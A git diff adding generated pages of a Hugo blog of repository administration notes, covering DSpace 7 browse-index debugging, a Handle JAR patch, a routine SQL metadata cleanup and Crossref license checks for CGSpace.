+<li>Oh now, now they are gone again, sigh&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-28">2023-06-28</h2>
+<ul>
+<li>Spent a lot of time debugging the browse indexes
+<ul>
+<li>Looking at the <a href="https://api7.dspace.org/server/api/discover/browses">DSpace 7 demo API</a> I see the four default browse indexes from <code>dspace.cfg</code> and the one default <code>srsc</code> one that gets automatically enabled from the <code>&lt;vocabulary&gt;srsc&lt;/vocabulary&gt;</code> in the <code>submission-forms.xml</code></li>
+<li>The same API call on my test DSpace 7 configuration results in the HTTP 500 I&rsquo;ve been seeing for some time, and I am pretty sure it&rsquo;s due to the automagic configuration of hierarchical browses based on the submission form</li>
+<li>Yes, if I remove them all from my submission form then this works: http://localhost:8080/server/api/discover/browses</li>
+<li>I went through each of our vocabularies and tested them one by one:
+<ul>
+<li>dcterms-subject: OK</li>
+<li>dc-contributor-author: NO</li>
+<li>cg-creator-identifier: NO</li>
+<li>cg-contributor-affiliation: OK (and with <code>facetType: &quot;affiliation&quot;</code> in API response?!)</li>
+<li>cg-contributor-donor: OK (<code>facetType:	&quot;sponsorship&quot;</code>)</li>
+<li>cg-journal: NO</li>
+<li>cg-coverage-subregion: NO</li>
+<li>cg-species-breed: NO</li>
+</ul>
+</li>
+<li>Now I need to figure out what it is about those five that causes them to not work!</li>
+<li>Ah, after debugging with someone on the DSpace Slack, I realized that DSpace expects these vocabularies to have corresponding indexes configured in <code>discovery.xml</code>, and they must be added as search filters AND sidebar facets.</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-29">2023-06-29</h2>
+<ul>
+<li>I noticed there is now a <a href="https://github.com/DSpace/DSpace/issues/8557#issuecomment-1595340249">patched version of the Handle JAR for DSpace 6.x</a>
+<ul>
+<li>This fixes the <a href="https://groups.google.com/g/dspace-tech/c/PqjfA5mqG4w/m/FhxI5oXhFwAJ?pli=1">issue in OpenJDK 1.8.0_352</a>, so we can remove the apt pin on JDK now</li>
+<li>I deployed it on CGSpace and it&rsquo;s working!</li>
+</ul>
+</li>
+<li>I lowercased all our AGROVOC terms because I noticed a few that were not:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>BEGIN
+</span></span><span style="display:flex;"><span>dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 53
+</span></span><span style="display:flex;"><span>dspace=*# COMMIT;
+</span></span></code></pre></div><ul>
+<li>After more discussion about the NullPointerException related to browse options, I filed <a href="https://github.com/DSpace/DSpace/issues/8927">an issue</a></li>
+</ul>
+<h2 id="2023-06-30">2023-06-30</h2>
+<ul>
+<li>I added another custom component to display CGIAR Impact Area icons in the DSpace 7 test</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023-07/index.html b/docs/2023-07/index.html
new file mode 100644
index 000000000..939397835
--- /dev/null
+++ b/docs/2023-07/index.html
@@ -0,0 +1,209 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2023" />
+<meta property="og:description" content="2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning " />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-07/" />
+<meta property="article:published_time" content="2023-07-01T17:14:36+03:00" />
+<meta property="article:modified_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2023"/>
+<meta name="twitter:description" content="2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning "/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-07/",
+  "wordCount": "225",
+  "datePublished": "2023-07-01T17:14:36+03:00",
+  "dateModified": "2023-07-01T17:17:31+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-07/">
+
+    <title>July, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-07/">July, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-07-01T17:14:36+03:00">Sat Jul 01, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-07-01">2023-07-01</h2>
+<ul>
+<li>Export CGSpace to check for missing Initiative collection mappings</li>
+<li>Start harvesting on AReS</li>
+</ul>
+<h2 id="2023-07-02">2023-07-02</h2>
+<ul>
+<li>Minor edits to the <code>crossref_doi_lookup.py</code> script while running some checks from 22,000 CGSpace DOIs</li>
+</ul>
+<h2 id="2023-07-03">2023-07-03</h2>
+<ul>
+<li>I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect
+<ul>
+<li>I took the more accurate ones from Crossref and updated the items on CGSpace</li>
+<li>I took a few hundred ISBNs as well for where we were missing them</li>
+<li>I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer</li>
+<li>Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref)</li>
+<li>I would be curious to write a script to check the Unpaywall API for open access status&hellip;</li>
+<li>In the past I found that their <em>license</em> status was not very accurate, but the open access status might be more reliable</li>
+</ul>
+</li>
+<li>More minor work on the DSpace 7 item views
+<ul>
+<li>I learned some new Angular template syntax</li>
+<li>I created a custom component to show Creative Commons licenses on the simple item page</li>
+<li>I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023/01/cpu-week.png b/docs/2023/01/cpu-week.png
new file mode 100644
index 000000000..087d9e888
Binary files /dev/null and b/docs/2023/01/cpu-week.png differ
diff --git a/docs/2023/01/jmx_dspace_sessions-year.png b/docs/2023/01/jmx_dspace_sessions-year.png
new file mode 100644
index 000000000..5cbc61563
Binary files /dev/null and b/docs/2023/01/jmx_dspace_sessions-year.png differ
diff --git a/docs/2023/01/postgres_connections_ALL-day.png b/docs/2023/01/postgres_connections_ALL-day.png
new file mode 100644
index 000000000..b9c2fe966
Binary files /dev/null and b/docs/2023/01/postgres_connections_ALL-day.png differ
diff --git a/docs/2023/04/quality-vs-score-ssimulacra-v2.1.png b/docs/2023/04/quality-vs-score-ssimulacra-v2.1.png
new file mode 100644
index 000000000..55eccf90d
Binary files /dev/null and b/docs/2023/04/quality-vs-score-ssimulacra-v2.1.png differ
diff --git a/docs/404.html b/docs/404.html
new file mode 100644
index 000000000..3efbc53a8
--- /dev/null
+++ b/docs/404.html
@@ -0,0 +1,149 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="404 Page not found" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/404.html" />
+
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="404 Page not found"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/404.html">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title">Page Not Found</h2>
+  </header>
+  <p>Page not found. Go back <a href="/">home</a>.</p>
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/index.html b/docs/categories/index.html
new file mode 100644
index 000000000..133fc237f
--- /dev/null
+++ b/docs/categories/index.html
@@ -0,0 +1,162 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Categories" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Categories"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/categories/notes/">Notes</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-07-01T17:14:36+03:00">Sat Jul 01, 2023</time> by Alan Orth</p>
+  </header>
+  
+  <a href='https://alanorth.github.io/cgspace-notes/categories/notes/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/index.xml b/docs/categories/index.xml
new file mode 100644
index 000000000..fad5a3ad4
--- /dev/null
+++ b/docs/categories/index.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Categories on CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/categories/</link>
+    <description>Recent content in Categories on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Sat, 01 Jul 2023 17:14:36 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>Notes</title>
+      <link>https://alanorth.github.io/cgspace-notes/categories/notes/</link>
+      <pubDate>Sat, 01 Jul 2023 17:14:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/categories/notes/</guid>
+      <description></description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html
new file mode 100644
index 000000000..a55b289c5
--- /dev/null
+++ b/docs/categories/notes/index.html
@@ -0,0 +1,425 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-07/">July, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-07-01T17:14:36+03:00">Sat Jul 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning 
+  <a href='https://alanorth.github.io/cgspace-notes/2023-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-06/">June, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-06-02T10:29:36+03:00">Fri Jun 02, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-06-02">2023-06-02</h2>
+<ul>
+<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace
+<ul>
+<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li>
+</ul>
+</li>
+<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+<ul>
+<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li>
+<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-05/">May, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-05-03T08:53:36+03:00">Wed May 03, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-05-03">2023-05-03</h2>
+<ul>
+<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+<ul>
+<li>It seems their password expired, which is annoying</li>
+</ul>
+</li>
+<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+<ul>
+<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li>
+<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly</li>
+</ul>
+</li>
+<li>Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-04/">April, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-04-02T08:19:36+03:00">Sun Apr 02, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
